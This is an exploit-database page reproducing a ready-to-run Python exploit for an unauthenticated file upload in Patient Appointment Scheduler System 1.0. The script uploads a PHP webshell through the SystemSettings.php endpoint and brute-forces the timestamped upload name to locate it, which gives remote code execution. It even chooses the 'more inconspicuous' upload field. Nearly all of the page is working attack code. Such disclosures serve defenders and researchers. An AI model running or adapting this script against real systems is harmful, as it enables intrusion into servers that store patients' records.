Vulners
Lucene search
Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload
ποΈΒ 06 Sep 2021Β 00:00:00Reported byΒ a-reyTypeΒ 
Β exploitdbπΒ www.exploit-db.comπΒ 133Β Views
# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload
# Date: 03/09/2021
# Exploit Author: a-rey
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import logging
import requests
import argparse
BANNER = """
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
by: \033[0m\033[1;31m ββββββ βββββββ βββββββββββ βββ\033[0m
\033[0m\033[1;32mββββββββ βββββββββββββββββββ βββ\033[0m
\033[0m\033[1;33mββββββββ βββ ββββββββββββββ βββ ββββ\033[0m
\033[0m\033[1;34mββββββββ ββββββββββββββ ββββ \033[0m
\033[0m\033[1;35mβββ βββ βββ βββββββββββ βββ \033[0m
\033[0m\033[1;36mβββ βββ βββ βββββββββββ βββ \033[0m
"""
def exploit(url:str, file:str, delay:int) -> None:
if not os.path.exists(file):
logging.error(f'webshell payload "{file}"" does not exist?')
return
logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
uploadTime = int(time.time())
r = requests.post(url + '/classes/SystemSettings.php',
files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
params={'f' : 'update_settings'},
verify=False
)
if not r.ok:
logging.error('HTTP upload request failed')
return
logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
for i in range(uploadTime - delay, uploadTime + delay + 1):
r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
# NOTE: website will send redirects for all files that do not exist
if r.status_code != 302:
logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
return
logging.error('failed to find payload on target')
logging.warning('maybe need a larger delay or uploads directory is not writable?')
return
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True)
parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
args = parser.parse_args()
# define logger
logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
logging.SUCCESS = logging.CRITICAL + 1
logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
# print banner
print(BANNER)
# run exploit
exploit(args.url, args.payload, args.delay)Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Sep 2021 00:00Current
7High risk
Vulners AI Score7